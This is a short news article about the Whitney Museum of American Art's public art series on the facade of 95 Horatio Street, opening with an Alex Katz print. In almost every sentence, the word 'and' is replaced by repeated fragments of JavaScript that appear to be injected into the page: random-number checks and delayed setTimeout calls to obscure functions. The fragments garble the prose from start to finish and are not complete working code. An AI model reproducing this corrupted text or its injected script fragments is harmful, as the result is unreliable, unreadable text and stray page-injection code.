NEW YORK CITY — In celebration of the Whitney Museum of American Art’s forthcoming move to its new Renzo Piano-designed building in the Meatpacking District, the museum has partnered with TF Cornerstone andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and High Line Art on a series of public art installations. Unfolding over the course of the next five years, the museum will mount a succession of works by key American artists on the facade of TF Cornerstone’s building at 95 Horatio Street directly across Gansevoort Street from the southern end of the High Line andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the future Whitney, which will open to the public in spring 2015.
The first installation, “Katherine andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Elizabeth,” 2014, by the New York-based artist Alex Katz, is expected to be unveiled in September.
The women depicted in “Katherine andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Elizabeth” are friends andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and familiar subjects for Katz, who is known for his bright palette, graphic sensibility andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and cinematic cropping. He made several studies in Maine in 2012 before completing the final work on which this 17-by-29-foot digital print on vinyl is based.
This installation is the latest of several public art projects the Whitney has been involved in organizing near its future home, underscoring its commitment to the surrounding neighborhood. In 2010, the museum launched “Whitney on Site: New Commissions Downtown,” which mounted site-specific works by Tauba Auerbach, GuytonWalker (a collaboration between Wade Guyton andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Kelley Walker) andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Barbara Kruger at the construction site.
In 2011, the museum tapped choreographer Elizabeth Streb to debut an original piece at the May groundbreaking ceremony for the new building, as well as the new work, “Ascension,” presented in Gansevoort Plaza in July. In 2012, the Whitney collaborated with DDG Partners to wrap the construction site on the building at 345 West 14th Street in Yayoi Kusama’s “Yellow Trees,” andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and it worked with High Line Art for the installation of Richard Artschwager’s “Blps” along the High Line andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and on neighborhood structures. Both projects were pegged to retrospectives of the artists at the Whitney.
For additional information, www.whitney.org or 212-570-3633.